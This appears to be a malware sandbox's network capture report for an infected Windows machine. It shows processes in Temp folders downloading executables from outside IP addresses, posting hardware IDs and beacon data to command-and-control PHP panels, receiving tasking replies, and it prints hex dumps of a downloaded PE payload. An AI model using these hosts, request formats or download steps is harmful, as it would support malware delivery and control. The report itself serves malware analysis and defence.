00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,1+`Ui` @ @.rsrc`2@.idata 8@smeyiuht+*:@kkcdotxm +4+@.taggant@+":+@
Dec 10, 2024 00:43:52.328201056 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.328847885 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.328921080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.328929901 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.329637051 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.329711914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.329726934 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.329929113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.330060959 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:52.449698925 CET	1236	IN	Data Raw: 5c 22 5f 9e 50 e0 1c 4d 37 80 62 94 17 f3 2a b1 7e 50 00 a5 73 c7 46 9a fe fd e7 a1 04 8d 93 ef 11 d6 09 a8 f3 f6 26 cc 38 ec df b5 28 fb 26 bf 73 d0 15 a4 65 6f 1b 53 2d c0 fb 28 6f e2 95 50 7d d1 32 78 36 c0 fe c8 cf f5 4c 28 6f e2 95 c2 7c dd Data Ascii: \"_PM7b~PsF&8(&seoS-(oP}2x6L(o\|2(:\0}g)3rp]v<$SL\|BC-`U_#N02;nt9&/~<G^RCr@js:nVh5r\7Vo&O+cU2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49927	185.215.113.16	80	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:56.540750980 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 10, 2024 00:43:57.869158030 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:57 GMT Content-Type: application/octet-stream Content-Length: 2841600 Last-Modified: Mon, 09 Dec 2024 23:14:30 GMT Connection: keep-alive ETag: "675779d6-2b5c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,1+`Ui` @ @.rsrc`2@.idata 8@smeyiuht+*:@kkcdotxm +4+@.taggant@+":+@
Dec 10, 2024 00:43:57.869242907 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:57.869252920 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:57.869390011 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:57.869461060 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:57.869474888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:57.869488001 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:57.869831085 CET	1236	IN	Data Raw: c8 ca 1a ef f0 af 19 a4 69 9e 1b 2c 79 48 7e 9e cd 63 64 8e 0a 85 77 4e 3c d8 55 ad a3 65 c5 bb 11 56 af 0a a6 47 84 ce c1 1f 5e 94 96 81 e9 ae 5a d9 39 9e 1e d4 16 52 6b 87 1c 50 5b d1 d2 b8 56 cc 09 ee f0 d3 0d f6 0c e8 3a 54 7d ee 1c 3f 2e 37 Data Ascii: i,yH~cdwN<UeVG^Z9RkP[V:T}?.7TfqdUzF3$hp1Srw\|;/d-;54PcPWDsU\3KRv^eGj]bZW<iWND}Xc'
Dec 10, 2024 00:43:57.869841099 CET	1236	IN	Data Raw: dc cb 33 f4 b4 cb 3f 88 cd 3e bb 94 73 f6 35 1d 2a fe 09 90 f8 85 57 8d 3a 53 5f e4 54 96 0f ef 2a fe 4f 8e c8 b6 4b e9 c5 c5 8d 6c 54 cb 73 ee 2a aa 33 dc f8 92 63 9a 06 6f 69 d0 2c f6 97 b5 fa f7 af 30 73 4a 06 66 54 56 27 ef ea e7 8f 3c e2 0e Data Ascii: 3?>s5W:S_TOKlTs3coi,0sJfTV'<.ruZz%lg[@[`b\|z%NSt"[/PsDJBC1P.J\luzy_%DlJ1VAls;/TOMg
Dec 10, 2024 00:43:57.869858980 CET	1236	IN	Data Raw: 15 ec 0a e5 fe 8e 33 b9 19 b3 c3 ee 61 32 04 1b 67 c5 31 dc 24 db 5f 45 70 a0 44 cd 07 2e 6e 4a 0e f3 45 df 66 4f 51 ab db a1 ee b9 4a e4 4e 75 1a d6 6f fe 74 b5 82 c8 5a c6 95 c8 0b a5 63 31 e2 db 67 9d 58 a1 7f e7 65 1c af ef ec 7b 2a 38 a9 30 Data Ascii: 3a2g1$_EpD.nJEfOQJNuotZc1gXe{*80\|H-[KsPos^ER;EPjE)TR\S8+O8RRT(1}tSShE-fe^5dX7
Dec 10, 2024 00:43:57.997111082 CET	1236	IN	Data Raw: 6c 93 fa 40 42 e2 14 b0 46 6e 1e ab 8f c2 51 8f 76 db 05 2f 76 e2 73 bc 7b fc e7 c4 75 d3 f8 9f 76 d2 7d e2 2b e7 a1 79 f9 2f e8 d5 17 15 36 1d 2d 08 6b eb 15 b4 3b ac 2a c4 01 fb 0c a7 67 e2 7c a9 79 e9 06 a5 72 5d aa eb 18 7f ba b1 64 29 0a 2e Data Ascii: l@BFnQv/vs{uv}+y/6-k;g\|yr]d).~u\|x_nsi.n2.N$3=#qbE"MV2 X/=9.$p7rPd;MT/p!7d-<Xr-/NrwyhIgV;b'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49935	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:59.495001078 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013559001&unit=246122658369
Dec 10, 2024 00:44:00.836494923 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49944	34.107.221.82	80	8016	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:01.754955053 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:02.841991901 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41139 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49947	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:02.706825018 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:04.054033995 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49965	185.215.113.206	80	64	C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:05.355767965 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:06.697870016 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:44:06.701975107 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 2d 2d 0d 0a Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="build"stok------BFIJKEBFBFHIJJKEHDHI--
Dec 10, 2024 00:44:07.148435116 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49966	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:05.698045969 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:07.051898956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49975	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:08.803253889 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:10.142009974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49981	34.107.221.82	80	8016	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:10.230837107 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:44:11.318135977 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76690 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:44:21.478482962 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49982	34.107.221.82	80	8016	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:10.430912018 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:11.514919996 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 17:03:35 GMT Age: 24036 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:21.646689892 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49989	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:11.783231974 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:13.314311028 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49996	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:15.462457895 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:16.747490883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50014	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:18.459531069 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:19.795538902 CET	299	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 33 35 36 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 31 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d <c>1013560001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50015	80.82.65.70	80	2300	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:18.918030977 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
